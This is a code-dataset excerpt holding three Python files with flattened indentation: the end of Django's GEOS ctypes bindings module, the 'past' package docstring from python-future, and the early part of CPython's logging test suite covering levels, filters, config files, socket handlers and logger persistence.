# attached to a GEOS context handle -- this actually occurs in
# geos/prototypes/threadsafe.py.
_lgeos.initGEOS_r.restype = CONTEXT_PTR
_lgeos.finishGEOS_r.argtypes = [CONTEXT_PTR]
return _lgeos
# The notice and error handler C function callback definitions.
# Supposed to mimic the GEOS message handler (C below):
# typedef void (*GEOSMessageHandler)(const char *fmt, ...);
NOTICEFUNC = CFUNCTYPE(None, c_char_p, c_char_p)
def notice_h(fmt, lst):
fmt, lst = fmt.decode(), lst.decode()
try:
warn_msg = fmt % lst
except TypeError:
warn_msg = fmt
logger.warning('GEOS_NOTICE: %s\n' % warn_msg)
notice_h = NOTICEFUNC(notice_h)
ERRORFUNC = CFUNCTYPE(None, c_char_p, c_char_p)
def error_h(fmt, lst):
fmt, lst = fmt.decode(), lst.decode()
try:
err_msg = fmt % lst
except TypeError:
err_msg = fmt
logger.error('GEOS_ERROR: %s\n' % err_msg)
error_h = ERRORFUNC(error_h)
# #### GEOS Geometry C data structures, and utility functions. ####
# Opaque GEOS geometry structures, used for GEOM_PTR and CS_PTR
class GEOSGeom_t(Structure):
pass
class GEOSPrepGeom_t(Structure):
pass
class GEOSCoordSeq_t(Structure):
pass
class GEOSContextHandle_t(Structure):
pass
# Pointers to opaque GEOS geometry structures.
GEOM_PTR = POINTER(GEOSGeom_t)
PREPGEOM_PTR = POINTER(GEOSPrepGeom_t)
CS_PTR = POINTER(GEOSCoordSeq_t)
CONTEXT_PTR = POINTER(GEOSContextHandle_t)
# Used specifically by the GEOSGeom_createPolygon and GEOSGeom_createCollection
# GEOS routines
def get_pointer_arr(n):
"Gets a ctypes pointer array (of length `n`) for GEOSGeom_t opaque pointer."
GeomArr = GEOM_PTR * n
return GeomArr()
lgeos = SimpleLazyObject(load_geos)
class GEOSFuncFactory(object):
"""
Lazy loading of GEOS functions.
"""
argtypes = None
restype = None
errcheck = None
def __init__(self, func_name, *args, **kwargs):
self.func_name = func_name
self.restype = kwargs.pop('restype', self.restype)
self.errcheck = kwargs.pop('errcheck', self.errcheck)
self.argtypes = kwargs.pop('argtypes', self.argtypes)
self.args = args
self.kwargs = kwargs
self.func = None
def __call__(self, *args, **kwargs):
if self.func is None:
self.func = self.get_func(*self.args, **self.kwargs)
return self.func(*args, **kwargs)
def get_func(self, *args, **kwargs):
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
func = GEOSFunc(self.func_name)
func.argtypes = self.argtypes or []
func.restype = self.restype
if self.errcheck:
func.errcheck = self.errcheck
return func
# Returns the string version of the GEOS library. Have to set the restype
# explicitly to c_char_p to ensure compatibility across 32 and 64-bit platforms.
geos_version = GEOSFuncFactory('GEOSversion', restype=c_char_p)
# Regular expression should be able to parse version strings such as
# '3.0.0rc4-CAPI-1.3.3', '3.0.0-CAPI-1.4.1', '3.4.0dev-CAPI-1.8.0' or '3.4.0dev-CAPI-1.8.0 r0'
version_regex = re.compile(
r'^(?P<version>(?P<major>\d+)\.(?P<minor>\d+)\.(?P<subminor>\d+))'
r'((rc(?P<release_candidate>\d+))|dev)?-CAPI-(?P<capi_version>\d+\.\d+\.\d+)( r\d+)?$'
)
def geos_version_info():
"""
Returns a dictionary containing the various version metadata parsed from
the GEOS version string, including the version number, whether the version
is a release candidate (and what number release candidate), and the C API
version.
"""
ver = geos_version().decode()
m = version_regex.match(ver)
if not m:
raise GEOSException('Could not parse version info string "%s"' % ver)
return {key: m.group(key) for key in (
'version', 'release_candidate', 'capi_version', 'major', 'minor', 'subminor')}
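# For a version string such as '3.4.0dev-CAPI-1.8.0' (one of the forms the
# regex above accepts), geos_version_info() returns roughly:
#   {'version': '3.4.0', 'major': '3', 'minor': '4', 'subminor': '0',
#    'release_candidate': None, 'capi_version': '1.8.0'}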
| mit |
ininex/geofire-python | resource/lib/python2.7/site-packages/past/__init__.py | 34 | 2948 | # coding=utf-8
"""
past: compatibility with Python 2 from Python 3
===============================================
``past`` is a package to aid with Python 2/3 compatibility. Whereas ``future``
contains backports of Python 3 constructs to Python 2, ``past`` provides
implementations of some Python 2 constructs in Python 3 and tools to import and
run Python 2 code in Python 3. It is intended to be used sparingly, as a way of
running old Python 2 code from Python 3 until the code is ported properly.
Potential uses for libraries:
- as a step in porting a Python 2 codebase to Python 3 (e.g. with the ``futurize`` script)
- to provide Python 3 support for previously Python 2-only libraries with the
same APIs as on Python 2 -- particularly with regard to 8-bit strings (the
``past.builtins.str`` type).
- to aid in providing minimal-effort Python 3 support for applications using
libraries that do not yet wish to upgrade their code properly to Python 3, or
wish to upgrade it gradually to Python 3 style.
Here are some code examples that run identically on Python 3 and 2::
>>> from past.builtins import str as oldstr
>>> philosopher = oldstr(u'\u5b54\u5b50'.encode('utf-8'))
>>> # This now behaves like a Py2 byte-string on both Py2 and Py3.
>>> # For example, indexing returns a Python 2-like string object, not
>>> # an integer:
>>> philosopher[0]
'\xe5'
>>> type(philosopher[0])
<past.builtins.oldstr>
>>> # List-producing versions of range, reduce, map, filter
>>> from past.builtins import range, reduce
>>> range(10)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> reduce(lambda x, y: x+y, [1, 2, 3, 4, 5])
15
>>> # Other functions removed in Python 3 are resurrected ...
>>> from past.builtins import execfile
>>> execfile('myfile.py')
>>> from past.builtins import raw_input
>>> name = raw_input('What is your name? ')
What is your name? [cursor]
>>> from past.builtins import reload
>>> reload(mymodule) # equivalent to imp.reload(mymodule) in Python 3
>>> from past.builtins import xrange
>>> for i in xrange(10):
... pass
It also provides import hooks so you can import and use Python 2 modules like
this::
$ python3
>>> from past import autotranslate
    >>> autotranslate('mypy2module')
>>> import mypy2module
until the authors of the Python 2 modules have upgraded their code. Then, for
example::
>>> mypy2module.func_taking_py2_string(oldstr(b'abcd'))
Credits
-------
:Author: Ed Schofield
:Sponsor: Python Charmers Pty Ltd, Australia: http://pythoncharmers.com
Licensing
---------
Copyright 2013-2016 Python Charmers Pty Ltd, Australia.
The software is distributed under an MIT licence. See LICENSE.txt.
"""
from past.translation import install_hooks as autotranslate
from future import __version__, __copyright__, __license__
__title__ = 'past'
__author__ = 'Ed Schofield'
| mit |
denisff/python-for-android | python3-alpha/python3-src/Lib/test/test_logging.py | 47 | 76391 | #!/usr/bin/env python
#
# Copyright 2001-2011 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2011 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import re
import select
import socket
from socketserver import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.support import captured_stdout, run_with_locale, run_unittest
from test.support import TestHandler, Matcher
import textwrap
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values),
'%s vs. %s' % (actual_lines, expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
        # Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
        DEB.warn(m())
        DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
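        # The framing matches what logging.handlers.SocketHandler.makePickle()
        # produces on the sending side: a 4-byte big-endian length prefix
        # (struct.pack(">L", len(payload))) followed by the pickled dict of
        # LogRecord attributes.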
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return pickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
    def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
        self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
